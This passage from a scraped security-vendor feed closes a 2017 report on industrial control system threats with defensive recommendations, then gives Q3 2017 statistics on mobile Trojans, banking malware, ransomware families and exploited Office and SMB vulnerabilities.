Curiously, in spite of the relatively high overall percentage of attacks that reached ICS systems, the percentages of ICS computers attacked via removable media and email clients in Russia were relatively small – 4.4% and 1.4% respectively. One possible explanation is that risks associated with these attack vectors are largely mitigated through organizational measures, as well as the removable media and email handling practices established at industrial enterprises.
This interpretation is reassuring, since removable media and email are often used as penetration vectors in sophisticated targeted and APT attacks.

For countries of the Middle East, email was a significant (5%) source of infection, with the region leading the ranking based on this parameter.

## Our recommendations

To prevent accidental infections in industrial networks, we recommend taking a set of measures designed to secure the internal and external perimeters of these networks.

This includes, first and foremost, measures required to provide secure remote access to automation systems and secure transfer of data between the industrial network and other networks that have different trust levels:

* Systems that have full-time or regular connections to external networks (mobile devices, VPN concentrators, terminal servers, etc.) should be isolated into a separate segment of the industrial network – the demilitarized zone (DMZ);
* Systems in the demilitarized zone should be divided into subnets or virtual subnets (VLAN), with restricted access between subnets (only the communications that are required should be allowed);
* All the necessary communication between the industrial network and the outside world (including the enterprise's office network) should be performed via the DMZ;
* If necessary, terminal servers that support reverse connection methods (from the industrial network to the DMZ) can be deployed in the DMZ;
* Thin clients should be used whenever possible to access the industrial network from the outside (using reverse connection methods);
* Access from the demilitarized zone to the industrial network should be blocked;
* If the enterprise's business processes are compatible with one-way communication, we recommend that you consider using data diodes.

The threat landscape for industrial automation systems is continually changing, with new vulnerabilities regularly found both in application software and in industrial software. Based on the threat evolution trends identified in H2 2017, we recommend placing special emphasis on the following security measures:

* Regularly updating the operating systems, application software and security solutions on systems that are part of the enterprise's industrial network;
* Installing firmware updates on control devices used in industrial automation systems in a timely manner;
* Restricting network traffic on ports and protocols used on the edge routers between the organization's network and those of other companies (if information is transferred from one company's industrial network to another company);
* An emphasis on account control and password policies is recommended. Users should have only those privileges that are required for them to perform their responsibilities. The number of user accounts with administrative privileges should be as limited as possible. Strong passwords (at least 9 characters, both upper and lower case, combined with digits and special characters) should be used, with regular password changing enforced by the domain policy, for example, every 90 days.

To provide protection from accidental infections with new, previously unknown malware and targeted attacks, we recommend doing the following on a regular basis:

1. Taking an inventory of running network services on all hosts of the industrial network; where possible, stopping vulnerable network services (unless this will jeopardize the continuity of industrial processes) and other services that are not directly required for the operation of the automation system; special emphasis should be placed on services that provide remote access to file system objects, such as SMB/CIFS and/or NFS (which is relevant in the case of attacks on systems running Linux).
2. Auditing ICS component access control; trying to achieve maximum access granularity.
3. Auditing the network activity in the enterprise's industrial network and at its boundaries. Eliminate any network connections with external and other adjacent information networks that are not required by industrial processes.
4. Verifying the security of remote access to the industrial network; placing a special emphasis on whether demilitarized zones are set up in compliance with IT security requirements. To the fullest extent possible, minimizing or completely eliminating the use of remote administration tools (such as RDP or TeamViewer). More details on this are provided above.
5. Ensuring that signature databases, heuristics and decision algorithms of endpoint security solutions are up-to-date. Checking that all the main protection components are enabled and running and that ICS software folders, OS system folders or user profiles are not excluded from the scope of protection. Application startup control technologies configured in whitelisting mode and application behavior analysis technologies are particularly effective for industrial enterprises. Application startup control will prevent cryptomalware from running even if it finds its way onto the computer, while application behavior analysis technologies are helpful for detecting and blocking attempts to exploit vulnerabilities (including unknown ones) in legitimate software.
6. Auditing policies and practices related to using removable media and portable devices. Blocking devices that provide illegitimate access to external networks and the Internet from being connected to industrial network hosts. Wherever possible, disabling the relevant ports or controlling access to these ports using properly configured dedicated tools.

In addition, to provide protection from targeted attacks directed at the enterprise's industrial network and its main industrial assets, we recommend deploying tools that provide network traffic monitoring and detection of cyberattacks on industrial networks.
In most cases, such measures do not require any changes to ICS components or their configuration and can be carried out without suspending their operation.\n\nOf course, completely isolating the industrial network from adjacent networks is virtually impossible, since transferring data between networks is required to perform a variety of important functions – controlling and maintaining remote facilities, coordinating sophisticated industrial processes, parts of which are distributed between numerous workshops, lines, plants and support systems. We hope, however, that our recommendations will help you provide maximum protection for your industrial networks and automation systems against existing and future threats.\n\n_**Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT)** is a global project of Kaspersky Lab aimed at coordinating the work of industrial automation system vendors, owners and operators of industrial facilities and IT security researchers in addressing issues associated with protecting industrial enterprises and critical infrastructure facilities._\n\n[ **Read the full \"Threat Landscape for Industrial Automation Systems in H2 2017\" report (English, PDF)**](<https://ics-cert.kaspersky.com/media/KL_ICS_REPORT_H2-2017_FINAL_EN_22032018.pdf>)", "modified": "2018-03-26T10:00:27", "published": "2018-03-26T10:00:27", "id": "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "href": "https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h2-2017/85053/", "type": "securelist", "title": "Threat Landscape for Industrial Automation Systems in H2 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-10T11:33:49", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "description": "\n\n## Q3 figures\n\nAccording to KSN data, Kaspersky Lab solutions detected and repelled 
**277,646,376** malicious attacks from online resources located in 185 countries all over the world.\n\n**72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\nAttempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.\n\nCrypto ransomware attacks were blocked on **186,283** computers of unique users.\n\nKaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.\n\nKaspersky Lab mobile security products detected:\n\n * **1,598,196** malicious installation packages;\n * **19,748** mobile banking Trojans (installation packages);\n * **108,073** mobile ransomware Trojans (installation packages).\n\n## Mobile threats\n\n### Q3 events\n\n#### The spread of the Asacub banker\n\nIn the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)\n\nNumber of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017\n\n#### New capabilities of mobile banking Trojans\n\nQ3 2017 saw two significant events in the world of mobile banking Trojans.\n\nFirstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. 
To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.\n\nInterestingly, in August we discovered yet another modification of Svpeng that uses special features. Only this time the Trojan was not banking related – instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)\n\nTrojan-Banker.AndroidOS.Svpeng.ag window containing ransom demand\n\nSecondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.\n\n#### The growth of WAP billing subscriptions\n\nIn the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.\n\nOur Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. 
They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.\n\n### Mobile threat statistics\n\nIn the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)\n\nNumber of detected malicious installation packages (Q4 2016 – Q3 2017)\n\n#### Distribution of mobile malware by type\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)\n\nDistribution of new mobile malware by type (Q2 and Q3 2017)\n\nRiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.\n\nTrojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.\n\nThe share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% – almost 4 p.p. 
less than in Q2.\n\nIn Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.\n\n#### TOP 20 mobile malware programs\n\n_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| Verdict | % of attacked users* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 67.14 \n2 | Trojan.AndroidOS.Boogr.gsh | 7.52 \n3 | Trojan.AndroidOS.Hiddad.ax | 4.56 \n4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96 \n5 | Trojan.AndroidOS.Loapi.b | 2.91 \n6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59 \n7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20 \n8 | Backdoor.AndroidOS.Ztorg.c | 2.09 \n9 | Trojan.AndroidOS.Agent.gp | 2.05 \n10 | Trojan.AndroidOS.Sivu.c | 1.98 \n11 | Trojan.AndroidOS.Hiddapp.u | 1.87 \n12 | Backdoor.AndroidOS.Ztorg.a | 1.68 \n13 | Trojan.AndroidOS.Agent.ou | 1.63 \n14 | Trojan.AndroidOS.Triada.dl | 1.57 \n15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57 \n16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53 \n17 | Trojan.AndroidOS.Hiddad.an | 1.48 \n18 | Trojan.AndroidOS.Hiddad.ci | 1.47 \n19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41 \n20 | Trojan.AndroidOS.Agent.eb | 1.29 \n \n_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._\n\nFirst place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.\n\nAs in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.\n\nTrojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C. 
The Trojan requests administrator rights to prevent its removal.\n\nTrojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan – a representative of the Loapi family. One of them – Trojan.AndroidOS.Loapi.b – came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.\n\nTrojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>) and [Svpeng](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>) mobile banking families.\n\nIn seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.\n\nTrojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them. 
It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).\n\nTrojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.\n\nOccupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.\n\nTrojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.\n\n#### The geography of mobile threats\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)\n\nThe geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Iran | 35.12 \n2 | Bangladesh | 28.30 \n3 | China | 27.38 \n4 | Côte d'Ivoire | 26.22 \n5 | Algeria | 24.78 \n6 | Nigeria | 23.76 \n7 | Indonesia | 22.29 \n8 | India | 21.91 \n9 | Nepal | 20.78 \n10 | Kenya | 20.43 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). 
\n** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._\n\nFor the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware – 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.\n\nRussia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.\n\nThe safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).\n\n#### Mobile banking Trojans\n\nOver the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)\n\nNumber of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 – Q3 2017)\n\nTrojan-Banker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. 
In addition, they steal money via SMS services, including mobile banking.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)\n\nGeography of mobile banking threats in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Russia | 1.20 \n2 | Uzbekistan | 0.40 \n3 | Kazakhstan | 0.36 \n4 | Tajikistan | 0.35 \n5 | Turkey | 0.34 \n6 | Moldova | 0.31 \n7 | Ukraine | 0.29 \n8 | Kyrgyzstan | 0.27 \n9 | Belarus | 0.26 \n10 | Latvia | 0.23 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nIn Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.\n\nOf particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter. 
This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.\n\n#### Mobile ransomware\n\nIn Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half the number detected in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)\n\nNumber of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 – Q3 2017)\n\nIn our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.\n\nTrojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)\n\nGeography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | US | 1.03% \n2 | Mexico | 0.91% \n3 | Belgium | 0.85% \n4 | Kazakhstan | 0.79% \n5 | Romania | 0.70% \n6 | Italy | 0.50% \n7 | China | 0.49% \n8 | Poland | 0.49% \n9 | Austria | 0.45% \n10 | Spain | 0.33% \n \n_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000. 
\n** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nThe US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.\n\nIn Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.\n\n## Vulnerable apps exploited by cybercriminals\n\nQ3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message – in case the embedded exploit fails.\n\nAlthough two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% of users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.\n\nThere were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update. 
However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)\n\nDistribution of exploits used in attacks by type of application attacked, Q3 2017\n\nThe distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2). The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.\n\n## Online threats (Web-based attacks)\n\n_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._\n\n### Online threats in the banking sector\n\n_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. 
Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)\n\nNumber of users attacked by financial malware, Q3 2017\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)\n\nGeography of banking malware attacks in Q3 2017 (percentage of all users attacked)\n\n**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**\n\n| Country* | % of users attacked** \n---|---|--- \n**1** | Togo | 2.30 \n**2** | China | 1.91 \n**3** | Taiwan | 1.65 \n**4** | Indonesia | 1.58 \n**5** | South Korea | 1.56 \n**6** | Germany | 1.53 \n**7** | United Arab Emirates | 1.52 \n**8** | Lebanon | 1.48 \n**9** | Libya | 1.43 \n**10** | Jordan | 1.33 \n \n_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000). 
\n** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\nThe table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):\n\n| Name* | % of attacked users** \n---|---|--- \n**1** | Trojan-Spy.Win32.Zbot | 27.9 \n**2** | Trojan.Win32.Nymaim | 20.4 \n**3** | Trojan.Win32.Neurevt | 10.0 \n**4** | Trickster | 9.5 \n**5** | SpyEye | 7.5 \n**6** | Caphaw | 6.3 \n**7** | Trojan-Banker.Win32.Gozi | 2.0 \n**8** | Shiz | 1.8 \n**9** | ZAccess | 1.6 \n**10** | NeutrinoPOS | 1.6 \n \n_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._\n\nThe malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.\n\n### Cryptoware programs\n\n#### Q3 highlights\n\n##### Crysis rises from the dead\n\nIn our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. 
This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.\n\nHowever, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing – the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.\n\nThe above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.\n\n##### Surge in Cryrar attacks\n\nThe Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim's files in password-encrypted RAR-sfx archives.\n\nIn the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar – a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim's system using the remote access protocol and manually launch the Trojan's installation file. 
The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.\n\nAccording to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.\n\n##### Master key to original versions of Petya/Mischa/GoldenEye published\n\nIn July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.\n\nThis happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>) which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.\n\nUnfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt MFT.\n\n#### The number of new modifications\n\nIn Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)\n\nNumber of newly created cryptor modifications, Q3 2016 – Q3 2017\n\nThe number of new cryptor modifications continues to decline compared to previous quarters. 
This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.\n\n#### The number of users attacked by ransomware\n\nJuly was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)\n\nNumber of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)\n\n#### The geography of attacks\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)\n\n#### Top 10 countries attacked by cryptors\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Myanmar | 0.95% \n2 | Vietnam | 0.92% \n3 | Indonesia | 0.69% \n4 | Germany | 0.62% \n5 | China | 0.58% \n6 | Russia | 0.51% \n7 | Philippines | 0.50% \n8 | Venezuela | 0.50% \n9 | Cambodia | 0.50% \n10 | Austria | 0.49% \n \n_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000) \n** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._\n\nMost of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.\n\nBrazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. 
Europe is represented by Germany (0.62%) and Austria (0.49%).\n\nRussia, in tenth the previous quarter, ended Q3 in sixth place.\n\n#### Top 10 most widespread cryptor families\n\n| **Name** | **Verdict*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% \n2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% \n3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% \n4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% \n5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% \n6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% \n8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% \n9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% \n \n_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._\n\nWannaCry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that WannaCry exploits.\n\nCrypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.\n\nThe cryptor Purgen (6.90%) rounds off the top three after rising from ninth. 
